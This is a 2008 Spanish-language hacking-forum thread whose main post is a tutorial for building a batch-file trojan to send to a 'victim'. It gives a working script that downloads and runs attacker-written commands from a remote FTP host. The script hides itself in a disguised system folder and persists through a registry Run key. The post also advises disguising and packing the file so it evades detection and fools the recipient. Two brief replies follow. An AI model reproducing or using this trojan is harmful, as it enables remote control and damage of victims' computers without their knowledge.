elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  TROYANIZANDO EN BATCH |GUN$|
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: TROYANIZANDO EN BATCH |GUN$|  (Leído 1,357 veces)
GUN$

Desconectado Desconectado

Mensajes: 17


Ver Perfil
TROYANIZANDO EN BATCH |GUN$|
« en: 6 Febrero 2008, 23:14 pm »

Troyanizando en batch




Indice:

->1.Introduccion
->2.Requisitos minimos
->3.Crear cuenta FTP
->4.Codigo para la vícitima
->5.Codigo FTP
->6.Iexpress + Themida + Cygy para Código FTP

_____________________________________________________________________


1.Introduccion

· Os voy a hacer un breve tutorial de como troyanizar en batch sin usar ningun ejecutable ;) solo con un .txt y un .bat; ayudandonos de lo maravilloso que es FTP ;)


2.Requisitos minimos

->notepad.exe (jajaja)
->una cuenta ftp
->Vía de propagacion
->Iexpress + themida + cygy


3.Crear cuenta FTP

->Crea tu cuenta FTP AQUI


4.Codigo para la vícitima

-> Llegados a este punto, crearemos un codigo en batch al cual nombraremos como ordenes.txt (no vale otro nombre)

->abrimos nuestro notepad... y a nuestro gusto creamos el code con programacion batch ;) el cual sera ejecutado en el pc de la víctima

·comandos interesantes:

-Dir
-Del
-Start
-Reg ADD
-Attrib
-Shutdown

Más información para crear vuestro code ;)


Cuando tengamos el code guardado como ordenes.txt; lo deberemos subir a nuestra cuenta FTP

·ordenes.txt será el codigo que se ejecute en el pc de la victima cada vez que inicie windows ;)

NOTA: Debereis rehacer a vuestro gusto vuestro ordenes.txt i volverlo a subir a vuestro ftp para que se ejecute en el pc de la victima cuando inicie windows ;)


5.Codigo FTP

Aqui os pongo el .bat que le tendreis que enviar a vuestra victima ;)

NOTA: Luego lo camuflaremos con themida o iexpress o cygy... comprimiendolo con un compresor (winrar, winzip....) para luego enviarlo.

Citar
  @echo off
pushd "%windir%\$NtUninstallWudf01000$\spuninst"
echo username>ftp.tmp
echo pass>>ftp.tmp
echo get ordenes.txt>>ftp.tmp
echo bye>>ftp.tmp
echo quit>>ftp.tmp
ftp -s:ftp.tmp ftp.geocities.com
del /f /q ftp.tmp
rename ordenes.txt soundUni.bat
start soundUni.bat
pushd "%homepath%\Mis documentos\Mis archivos recibidos"
copy /Y  "archivo_ftp.bat"  "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Uninstall" /t Reg_SZ /d "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat /f"
exit

·Username: Aqui debereis colocar vuestro usuario de ftp
·Pass: Aqui deberis poner la pass de vuestro ftp
·ordenes.txt: nunca cambies el nombre de vuestro archivo ordenes.txt ya que si lo cambiais el code no podria bajar el archivo para ejecutarlo en el pc de la victima ;)
·archivo_ftp.bat:Si el archivo que le enviareis a la victima lo compilais a .exe pues debereis cambiar el nombre a archivo_ftp.exe y si le dais un nombre menos llamativo a vuestro code pues quedaria asi:

Msn.exe ... por ejemplo...en el code tmb lo debeis sustituir....


6.Iexpress + Themida + Cygy para Código FTP

-> En esta parte es donde debereis compilar vuestro "msn.bat" a "msn.exe", comprimirlo y enviarlo por alguna via de red ;)

->Tutorial + Descarga por Txshack ;)

CYGY + THEMIDA + IEXPRESS




->La explicacion a sido breve i un poco imprecisa :S  lo siento.... si teneis alguna duda preguntenla por M.P o en este mismo post ;)


_____________________________________________________________________



TUTORIAL POR GUN$

FUENTE:http://foro.infiernohacker.com/index.php?topic=2641.0


En línea

Código:
<?php
$text = "Aprendiendo PHP";
echo $text;
?>
K-19


Desconectado Desconectado

Mensajes: 422


Sarah Wayne


Ver Perfil WWW
Re: TROYANIZANDO EN BATCH |GUN$|
« Respuesta #1 en: 7 Febrero 2008, 21:50 pm »

Está incompleto o es cosa mia?? que contiene el archivo ordenes.txt??  :rolleyes:


En línea

GUN$

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: TROYANIZANDO EN BATCH |GUN$|
« Respuesta #2 en: 10 Febrero 2008, 03:17 am »

contiene un codigo que ya has creado tu anterior y personalmente el cual se ejecutara en el pc de la victima
En línea

Código:
<?php
$text = "Aprendiendo PHP";
echo $text;
?>
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines